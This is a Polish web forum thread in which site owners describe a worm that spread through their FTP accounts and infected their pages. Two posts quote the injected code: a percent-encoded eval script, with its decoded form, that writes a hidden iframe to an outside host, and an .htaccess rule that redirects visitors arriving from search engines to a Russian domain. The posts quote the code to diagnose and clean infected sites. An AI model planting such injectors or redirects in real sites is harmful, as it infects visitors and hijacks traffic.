Ogłoszenia - [Problem] UWAGA ROBAK!
Gradziu - 15-10-2009, 15:17
a mozna zapamietywac hasła w firewzilla
draggero - 26-12-2009, 14:16
Stary temat ale ciągle to gówno krąży. Dziś mi iframe'a wrypał na forum a mam tcmd v 7.5 więc z szyfrowaniem AES czyli nie powinno być takich problemów.
slajma - 26-05-2010, 18:26
jak mam takiego wirusa to ja mam znales te IFRAME ??
Matteo - 26-05-2010, 18:28
| Cytat: | | jak mam takiego wirusa to ja mam znales te IFRAME ?? |
Możesz to napisać po polsku?
mbazyl - 26-05-2010, 18:28
No samo się nie znajdzie 
slajma - 26-05-2010, 18:55
pomoze mi ktos to znalesc i naprawic ?
z gory dzieki !
Default - 01-02-2011, 01:59
Dziś mnie to za atakowało na początku byłem pewny co i gdzie,
lecz przy pomocy Boltexa doszedłem do tego że wirus znajduję się pod plikami index.php i index.html,pliki zostały porozsyłane po różnich kategoriach na całym FTP przez wirusa,
w tych plikach znajdował się kod przedstawiony w tej formie:
| Kod: | | ><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%65%72%72%65%64%2E%6E%65%74%2F%3F%31%36%33%36%30%34%32%31%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --> |
Co po od haszowaniu oznacza:
| Kod: | | document.write('<iframe src="http://verred.net/?16360421"width=1 height=1></iframe>') |
Czyli typowy wirus który jest przedstawiany od niedawna w wielu poradnikach ostrzegających w sieci.
Usuwam te pliki wszystkie zobaczymy efekty końcowe.
jannypan - 12-03-2011, 02:51
Z błędów raczej nie znam nic oprocz tego co wymieniles, albo nie moge skojarzyc na ten moment. Ale dwie nowe funkcjonalnopsi by się przydaly:
KrYssTeeK - 27-10-2012, 21:34
Ruscy mnie blokują; o
Mam kilka domen, stron, wszedłem sobie na jedną z nich dzisiaj i pokazuje mi że wirus jest;o idę na kolejną a tam strona zablokowana przez google, sprawdzam ftp a tam ciekawe pliczki..
W znalazłem
| Cytat: | #c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://ripebet.ru/count9.php [R=301,L]
</IfModule>
#/c3284d#  |
Takie coś.. dziwna sprawa..
//edit.
Całe ftp mam w tym dziadostwie.. masakra..
|
|
|
